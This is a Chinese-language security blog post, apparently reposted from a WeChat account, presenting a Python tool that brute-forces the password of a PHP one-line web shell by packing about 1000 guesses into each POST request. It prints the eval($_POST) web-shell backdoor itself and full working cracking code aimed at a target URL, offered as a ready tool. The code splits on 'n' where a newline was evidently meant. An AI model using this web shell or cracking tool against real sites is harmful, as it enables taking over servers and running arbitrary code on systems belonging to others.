PHP一句话破解工具-(每秒1000+)

  • A+
所属分类:安全工具
原理

先来看一句话

1

2

3

<?php

eval($_POST['X']);

?>

普通的一句话破解工具是一次提交一个参数

1

xx=xx

这样1000个密码,得提交1000次POST

我写的工具一次提交1000个参数

1

xx=xx&xx=xx&xx=xx&xx=xx&xx=xx&xx=xx&xx=xx&xx=xx&xx=xx&xx=xx&xx=xx&xx=xx&xx=xx&xx=xx&xx=xx&xx=xx&xx=xx&xx=xx&xx=xx&xx=xx&xx=xx&xx=xx&xx=xx&xx=xx&xx=xx&xx=xx&xx=xx&xx=xx&xx=xx&xx=xx&xx=xx&xx=xx&xx=xx&xx=xx&xx=xx&xx=xx

这就是原理

CODE

#!/usr/bin/python

# -*- coding: utf-8 -*-

# -*- author: Wd0g  -*-

 

import requests

 

def makeList():

    passNum = 1000

    passFile = open('./passwd.txt','r+')

    passList = passFile.read().split('n')

    passFile.close()

    for i in range(1,int(len(passList)/passNum)+2):

        r = passNum * i

        l = r - passNum

        yield passList[l:r]

 

def makePost(passList):

    code = []

    for pwd in passList:

        code .append((pwd, "print(%s);" % pwd))

    return code

 

def run(url):

    for passList in makeList():

        response = requests.post(url,data=makePost(passList))

        if response.text != '':

            print(response.text)

            break

 

 

 

run('http://test.com/index.php')


其他

如果成功,会直接输出结果

我本地的环境是PY3.5,需要下载requests模块

这个只是我自己测试的时候写的代码

有空优化下


本文始发于微信公众号(飓风网络安全):PHP一句话破解工具-(每秒1000+)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: